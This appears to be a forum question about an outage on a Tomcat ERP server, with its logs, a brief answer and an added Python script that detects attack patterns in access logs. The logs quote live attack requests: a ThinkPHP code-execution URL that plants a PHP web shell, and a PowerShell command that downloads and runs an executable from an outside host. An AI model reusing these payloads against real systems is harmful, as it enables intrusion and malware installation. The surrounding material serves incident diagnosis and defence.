We have a Java web application running in Tomcat, which is hosted in AWS. The operating system used on the server is CentOS. Today it became inaccessible for more than 10 minutes. When we got access, we checked the logs to understand what happened. Interestingly, the log contains the following:

Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.

As I checked more, I found no logs between 2:22 PM and 2:39 PM, which is the time range when the server became inaccessible.

Application Log :-

2019-07-17 14:20:11.620 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39208, 0) already exists.
2019-07-17 14:20:53.469 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39209, 0) already exists.
2019-07-17 14:21:32.329 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.473 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39212, 0) already exists.
2019-07-17 14:22:27.987 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39213, 0) already exists.
2019-07-17 14:22:34.338 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39215, 0) already exists.
2019-07-17 14:45:04.900 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39217, 0) already exists.
2019-07-17 14:45:49.877 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39218, 0) already exists.
2019-07-17 14:47:14.155 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39219, 0) already exists.
2019-07-17 14:47:20.484 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39220, 0) already exists.
2019-07-17 14:49:09.092 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39221, 0) already exists.
2019-07-17 14:49:54.520 [ERROR] org.hibernate.engine.jdbc.spi.SqlExceptionHelper:146 - ERROR: duplicate key value violates unique constraint "uk_quet6ouhlocl2k46y998wj4kb"
  Detail: Key (bar_code, revision_id)=(100019-39223, 0) already exists.

Access Log :-

[17/Jul/2019:14:22:27 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 200 -
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 166
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 431
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 281
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 1131
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 537
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 3484
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 23255
[17/Jul/2019:14:22:27 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3170
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44314
[17/Jul/2019:14:22:28 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3512
[17/Jul/2019:14:22:29 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 3451
[17/Jul/2019:14:22:30 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 11953
[17/Jul/2019:14:22:31 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 16527
[17/Jul/2019:14:22:31 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44218
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 4695
[17/Jul/2019:14:22:32 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 3675
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7287
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6413
[17/Jul/2019:14:22:33 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 8066
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 9802
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=7 HTTP/1.1" 200 2634
[17/Jul/2019:14:22:34 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44122
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 6412
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 2132
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 44028
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 1800
[17/Jul/2019:14:39:38 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 4926
[17/Jul/2019:14:39:38 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:38 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:39 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 200 -
[17/Jul/2019:14:39:40 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 13606
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:40 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:39:42 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:42 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "POST /tmUnblock.cgi HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 200 1724
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:44 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354390370 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:44 +0530] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/vaadinBootstrap.js?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/themes/abcerp/styles.css?v=7.6.2 HTTP/1.1" 304 -
[17/Jul/2019:14:39:45 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354393114 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/popupbutton/popupbutton.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com.abc.erp.widgetset.abcerpWidgetset.nocache.js?1563354389975 HTTP/1.1" 200 3511
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/themes/valo/shared/img/spinner.gif HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/fi_jasoft_dragdroplayouts/dragdroplayouts.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_timeline/styles.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/com_vaadin_addon_calendar/calendar.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:46 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/easyuploads.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:47 +0530] "GET /VAADIN/widgetsets/com.abc.erp.widgetset.abcerpWidgetset/filtertable/filtertable.css HTTP/1.1" 304 -
[17/Jul/2019:14:39:54 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7730
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:39:54 +0530] "POST /?v-1563354393116 HTTP/1.1" 200 4843
[17/Jul/2019:14:39:55 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 237
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/abcerp/img/symphony.png HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Light-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /VAADIN/themes/valo/fonts/open-sans/OpenSans-Regular-webfont.woff HTTP/1.1" 304 -
[17/Jul/2019:14:39:55 +0530] "GET /APP/global/0/legacy/0/20180410112140264.png HTTP/1.1" 200 12363
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 8023
[17/Jul/2019:14:40:06 +0530] "POST /UIDL/?v-uiId=3 HTTP/1.1" 200 237
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=2 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=3 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=0 HTTP/1.1" 404 973
[17/Jul/2019:14:40:06 +0530] "POST /HEARTBEAT/?v-uiId=1 HTTP/1.1" 404 973
[17/Jul/2019:14:40:12 +0530] "GET / HTTP/1.1" 200 1706

Catalina Log :-

Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server version:        Apache Tomcat/7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server built:          Sep 14 2016 12:12:26 UTC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Server number:         7.0.72.0
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Name:               Linux
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: OS Version:            3.10.0-693.21.1.el7.x86_64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Architecture:          amd64
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Java Home:             /usr/lib/jvm/java-1.7.0-openjdk-1.7.0.171-2.6.13.0.el7_4.x86_64/jre
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Version:           1.7.0_171-mockbuild_2018_02_27_14_27-b00
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: JVM Vendor:            Oracle Corporation
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_BASE:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: CATALINA_HOME:         /var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.config.file=/var/abc/ERP/apache-tomcat-7.0.72/conf/logging.properties
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djdk.tls.ephemeralDHKeySize=2048
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dfile.encoding=UTF8
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dlog4j.ignoreTCL=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dserver.name=
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dorg.apache.catalina.loader.WebappClassLoader.ENABLE_CLEAR_REFERENCES=false
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dmail.debug=true
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Duser.timezone=GMT+5.30
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xms12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Xmx12288m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:MaxPermSize=4096m
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSClassUnloadingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+CMSPermGenSweepingEnabled
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+UseConcMarkSweepGC
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:NewRatio=2
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDetails
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:+PrintGCDateStamps
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:-HeapDumpOnOutOfMemoryError
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -XX:HeapDumpPath=/var/abc/dump
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.endorsed.dirs=/var/abc/ERP/apache-tomcat-7.0.72/endorsed
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.base=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Dcatalina.home=/var/abc/ERP/apache-tomcat-7.0.72
Jul 17, 2019 2:00:17 AM org.apache.catalina.startup.VersionLoggerListener log
INFO: Command line argument: -Djava.io.tmpdir=/var/abc/ERP/apache-tomcat-7.0.72/temp
Jul 17, 2019 2:00:17 AM org.apache.catalina.core.AprLifecycleListener lifecycleEvent
INFO: The APR based Apache Tomcat Native library which allows optimal performance in production environments was not found on the java.library.path: /usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:00:18 AM org.apache.coyote.AbstractProtocol init
INFO: Initializing ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:00:18 AM org.apache.catalina.startup.Catalina load
INFO: Initialization processed in 1898 ms
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardService startInternal
INFO: Starting service Catalina
Jul 17, 2019 2:00:18 AM org.apache.catalina.core.StandardEngine startInternal
INFO: Starting Servlet Engine: Apache Tomcat/7.0.72
Jul 17, 2019 2:00:18 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:33 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:33 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:00:53 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deploying web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war
Jul 17, 2019 2:00:53 AM org.apache.catalina.loader.WebappClassLoaderBase validateJarFile
INFO: validateJarFile(/var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP/WEB-INF/lib/javax.servlet-api-3.0.1.jar) - jar not loaded. See Servlet Spec 3.0, section 10.7.2. Offending class: javax/servlet/Servlet.class
Jul 17, 2019 2:00:56 AM org.apache.catalina.core.StandardContext checkUnusualURLPattern
INFO: Suspicious url pattern: "/rest/**" in context [/abcERP] - see sections 12.1 and 12.2 of the Servlet specification
Jul 17, 2019 2:00:56 AM org.apache.catalina.startup.TldConfig execute
INFO: At least one JAR was scanned for TLDs yet contained no TLDs. Enable debug logging for this logger for a complete list of JARs that were scanned but no TLDs were found in them. Skipping unneeded JARs during scanning can improve startup time and JSP compilation time.
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployWAR
INFO: Deployment of web application archive /var/abc/ERP/apache-tomcat-7.0.72/webapps/abcERP.war has finished in 18,798 ms
Jul 17, 2019 2:01:11 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/manager has finished in 78 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/examples has finished in 388 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/docs has finished in 36 ms
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deploying web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.HostConfig deployDirectory
INFO: Deployment of web application directory /var/abc/ERP/apache-tomcat-7.0.72/webapps/host-manager has finished in 29 ms
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["http-bio-8080"]
Jul 17, 2019 2:01:12 AM org.apache.coyote.AbstractProtocol start
INFO: Starting ProtocolHandler ["ajp-bio-8009"]
Jul 17, 2019 2:01:12 AM org.apache.catalina.startup.Catalina start
INFO: Server startup in 54377 ms
Jul 17, 2019 2:39:44 PM org.apache.tomcat.util.http.Parameters processParameters
INFO: Character decoding failed. Parameter [xcmd] with value [cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://fid.hognoob.se/download.exe','d.exe','%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe');start%20%SystemRoot%/Temp/azpoljhwrfqozxi22660.exe] has been ignored. Note that the name and value quoted here may be corrupted due to the failed decoding. Use debug level logging to see the original, non-corrupted values.
 Note: further occurrences of Parameter errors will be logged at DEBUG level.
Jul 17, 2019 3:33:04 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "tomcat"
Jul 17, 2019 3:33:07 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "manager"
Jul 17, 2019 3:33:10 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "admin"
Jul 17, 2019 3:33:15 PM org.apache.catalina.realm.LockOutRealm filterLockedAccounts
WARNING: An attempt was made to authenticate the locked user "root"

Can someone explain what happened?

Shakir

1 Answer

It looks like some malicious actor's automated attack tool tried to exploit Tomcat. It's not guaranteed that the downtime is associated with this attack, because your Tomcat instance probably receives attacks like these a lot. I would suggest looking at other stuff which could have caused the downtime.
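
An added example (not part of the original question or answer): a triage script for the access-log format shown in the question. It reports the interval with no logged requests and labels requests matching the scanner patterns visible in that log (ThinkPHP `invokefunction`, `hydra.php?xcmd=`, `/tmUnblock.cgi`), so their timing relative to the gap can be checked. The sample lines are constructed from the question's log with payloads replaced by `PAYLOAD`; the function names, signature labels and five-minute threshold are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample in the question's access-log format (payloads replaced by PAYLOAD).
SAMPLE = r'''
[17/Jul/2019:14:22:36 +0530] "POST /UIDL/?v-uiId=2 HTTP/1.1" 200 2132
[17/Jul/2019:14:22:37 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 1800
[17/Jul/2019:14:39:38 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 4926
[17/Jul/2019:14:39:42 +0530] "GET / HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "POST /tmUnblock.cgi HTTP/1.1" 200 1706
[17/Jul/2019:14:39:43 +0530] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=PAYLOAD HTTP/1.1" 200 1724
[17/Jul/2019:14:39:45 +0530] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20PAYLOAD HTTP/1.1" 200 1724
[17/Jul/2019:14:39:54 +0530] "POST /UIDL/?v-uiId=0 HTTP/1.1" 200 7730
'''

LINE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" '
                  r'(?P<status>\d{3}) (?P<size>\S+)')

# Hypothetical labels for the request shapes seen in the question's log.
SIGNATURES = [
    ("thinkphp-invokefunction", re.compile(r"invokefunction.*call_user_func_array", re.I)),
    ("php-webshell-xcmd", re.compile(r"\.php\?.*\bxcmd=", re.I)),
    ("router-cgi-tmUnblock", re.compile(r"/tmUnblock\.cgi", re.I)),
    ("windows-shell-command", re.compile(r"cmd\.exe|powershell", re.I)),
]

def parse(text):
    """Return one dict per parseable access-log line, in file order."""
    entries = []
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        entries.append({
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "target": unquote(m["target"]),  # decode %20 etc. before matching
            "status": int(m["status"]),
            "size": m["size"],               # may be "-" for empty bodies
        })
    return entries

def find_gaps(entries, threshold=timedelta(minutes=5)):
    """Pairs (last_seen, next_seen) where nothing was logged for longer than threshold."""
    return [(a["ts"], b["ts"]) for a, b in zip(entries, entries[1:])
            if b["ts"] - a["ts"] > threshold]

def find_probes(entries):
    """Entries matching at least one signature, with the labels that matched."""
    hits = []
    for e in entries:
        labels = [name for name, rx in SIGNATURES if rx.search(e["target"])]
        if labels:
            hits.append({**e, "labels": labels})
    return hits

def probes_logged_before(entries, moment):
    """Probe requests logged at or before the given timestamp."""
    return [p for p in find_probes(entries) if p["ts"] <= moment]

if __name__ == "__main__":
    entries = parse(SAMPLE)
    for start, end in find_gaps(entries):
        print(f"no requests logged {start:%H:%M:%S} -> {end:%H:%M:%S} ({end - start})")
        print("probes logged before the gap:", len(probes_logged_before(entries, start)))
    for p in find_probes(entries):
        print(f'{p["ts"]:%H:%M:%S} {p["status"]} {p["size"]:>6} {",".join(p["labels"])}')
```

The probes target PHP and Windows, while the catalina log shows Tomcat on Linux. A 200 status only means the application answered that URL, so compare the response size against a normal `GET /` (1706 bytes in this log) before treating a hit as successful.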